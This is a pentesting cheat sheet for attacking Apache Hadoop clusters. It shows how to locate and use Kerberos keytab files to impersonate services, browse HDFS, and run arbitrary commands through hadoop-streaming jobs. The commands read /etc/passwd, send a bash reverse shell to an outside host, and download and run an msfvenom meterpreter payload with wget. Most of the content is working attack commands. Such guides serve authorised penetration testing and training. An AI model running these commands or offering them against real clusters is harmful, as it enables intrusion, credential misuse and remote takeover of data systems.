Apache Hadoop Pentesting
Last modified: 2023-04-02
Apache Hadoop is a collection of open-source software utilities that facilitates using a network of many computers to solve problems involving massive amounts of data and computation. It uses ports 8020, 9000, 50010, 50020, 50070, 50075, 50475 by default.
Authenticate using Keytab
Kyetab files are used to authenticate to the KDC (key distribution center) on Kerberos authentication. To find them, execute the following command in target system.
find / -type f -name *.keytab 2>/dev/null
After finding them, we can use them to gather information or authenticate.
# Gather information from a keytab
# -k: Speicifed a keytab file
klist -k /path/to/example.keytab
# Authenticate to Kerberos server and request a ticket.
# <principal_name>: it' stored in example.keytab. Run `klist -k example.keytab` to check it.
# -k: Use a keytab
# -V: verbose mode
# -t <keytab_file>: Filename of keytab to use
kinit <principal_name> -k -V -t /path/to/example.keytab
# e.g.
kinit user/hadoop.docker.com@EXAMPLE.COM -k -V -t /path/to/example.keytab
Impersonate Another Hadoop Service
We can authenticate other services by executing klist
and kinit
. Then we can investigate the HDFS service by the following HDFS commands.
HDFS Commands
Find HDFS Binary Path
When authenticated, we need to find the path of the hdfs
command associated with Hadoop. This command allows us to execute file system command in the datalake.
If the path exists in the default PATH (confirm to run echo $PATH
), we don't have to find them. However, if the path is not set in the default PATH, find it by running the following command.
find / -type f -name hdfs 2>/dev/null
If we find the path, go to the directory and use commands as below.
HDFS Command Cheat Sheet
Please refer to https://hadoop.apache.org/docs/current/hadoop-project-dist/hadoop-hdfs/HDFSCommands.html#Overview
As mentioned above, if the hdfs
path is not set in the PATH, we need to go to where the hdfs
binary exists.
Basically, their commands are similar to UNIX.
hdfs dfs -help
# List files in the hdfs service root.
hdfs dfs -ls /
# -R: Recursive
hdfs dfs -ls /R /
# Get the contents of the file
hdfs dfs -cat /example.txt
RCE (Remote Code Execution)
First we need to create arbitrary file that contains at lease one character. Then put it on HDFS.
echo hello > /tmp/hello.txt
hdfs dfs -put /tmp/hello.txt /tmp/hello.txt
Now execute below command to execute remote command.
Note that the -output
directory needs to be NOT exist, so if we want to multiple execute command, we have to delete the previous output folder or specify another name.
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "cat /etc/passwd" -reducer NONE
We can see the result of the command in the output directory. For example,
hdfs dfs -ls /tmp/output
hdfs dfs -cat /tmp/output/part-00000
Reverse Shell
In target machine, create a reverse shell script and put it on HDFS.
echo '/bin/bash -i >& /dev/tcp/10.0.0.1/4444 0>&1' > /tmp/shell.sh
hdfs dfs -put /tmp/shell.sh /tmp/shell.sh
In local machine, start a listener.
nc -lvnp 4444
Now execute the following command.
# -mapper: The HDFS path of the shell.elf
# -file: The system path of the shell.elf
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.sh" -reducer NONE -file "/tmp/shell.sh" -background
We can get a shell in local machine.
Reverse Shell (MsfVenom)
First create a reverse shell payload using msfvenom in local machine and prepare a listener using msfconsole.
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=4444 -f elf > shell.elf
msfconsole
msf> use exploit/multi/handler
msf> set payload linux/x86/meterpreter/reverse_tcp
msf> set lhost 10.0.0.1
msf> set lport 4444
msf> run
Transfer the payload to target machine.
wget http://10.0.0.1:8000/shell.elf -O /tmp/shell.elf
# Put it on HDFS.
hdfs dfs -put /tmp/shell.elf /tmp/shell.elf
Now execute the following command.
# -mapper: The HDFS path of the shell.elf
# -file: The system path of the shell.elf
hadoop jar /path/to/hadoop-streaming-x.x.x.jar -input /tmp/hello.txt -output /tmp/output -mapper "/tmp/shell.elf" -reducer NONE -file "/tmp/shell.elf" -background
We can get a shell in meterpreter so to spawn the OS shell, run shell
command in the meterpreter.